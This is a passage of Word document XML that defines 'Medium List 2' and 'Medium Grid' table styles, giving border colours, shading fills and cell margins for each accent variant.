        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1"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4">
    <w:name w:val="Medium List 2 Accent 1"/>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E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1"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7E97AD" w:themeColor="accent1" w:sz="24" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1"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7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1"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DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1"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5">
    <w:name w:val="Medium List 2 Accent 2"/>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C8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="CC8E60" w:themeColor="accent2"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tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2"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CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2"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F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2"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6">
    <w:name w:val="Medium List 2 Accent 3"/>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A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="7A6A60" w:themeColor="accent3"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7A6A60" w:themeColor="accent3" w:sz="24" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3"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7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3"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DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3"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7">
    <w:name w:val="Medium List 2 Accent 4"/>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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeColor="accent4" w:sz="24" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="B4936D" w:themeColor="accent4"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ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4"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8">
    <w:name w:val="Medium List 2 Accent 5"/>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67787B" w:themeColor="accent5" w:sz="24" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="67787B" w:themeColor="accent5"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67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="67787B" w:themeColor="accent5"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D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5"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9">
    <w:name w:val="Medium List 2 Accent 6"/>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D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="9D936F" w:themeColor="accent6"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9D936F" w:themeColor="accent6" w:sz="24" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9D936F" w:themeColor="accent6"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9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="9D936F" w:themeColor="accent6"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E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6"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200">
    <w:name w:val="Medium Grid 1"/>
    <w:basedOn w:val="106"/>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Layout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="3F3F3F" w:themeColor="text1" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="201">
    <w:name w:val="Medium Grid 1 Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="67"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="202">
    <w:name w:val="Medium Grid 1 Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="67"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="D8AA87" w:themeColor="accent2" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="D8AA87" w:themeColor="accent2" w:themeTint="BF" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="D8AA87" w:themeColor="accent2" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="203">
    <w:name w:val="Medium Grid 1 Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="67"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="9E8E84" w:themeColor="accent3" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="9E8E84" w:themeColor="accent3" w:themeTint="BF" w:sz="8"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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9E8E84" w:themeColor="accent3" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="204">
    <w:name w:val="Medium Grid 1 Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="67"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="205">
    <w:name w:val="Medium Grid 1 Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="67"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="8B9B9E" w:themeColor="accent5" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="8B9B9E" w:themeColor="accent5" w:themeTint="BF" w:sz="8"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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="8B9B9E" w:themeColor="accent5" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="206">
    <w:name w:val="Medium Grid 1 Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="67"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="B5AE93" w:themeColor="accent6" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="B5AE93" w:themeColor="accent6" w:themeTint="BF" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B5AE93" w:themeColor="accent6" w:themeTint="BF" w:sz="18" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="207">
    <w:name w:val="Medium Grid 2"/>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Layout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E5E5" w:themeFill="text1"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CCCCCC" w:themeFill="text1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="208">
    <w:name w:val="Medium Grid 2 Accent 1"/>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E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F4F6" w:themeFill="accent1"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5EAEE" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
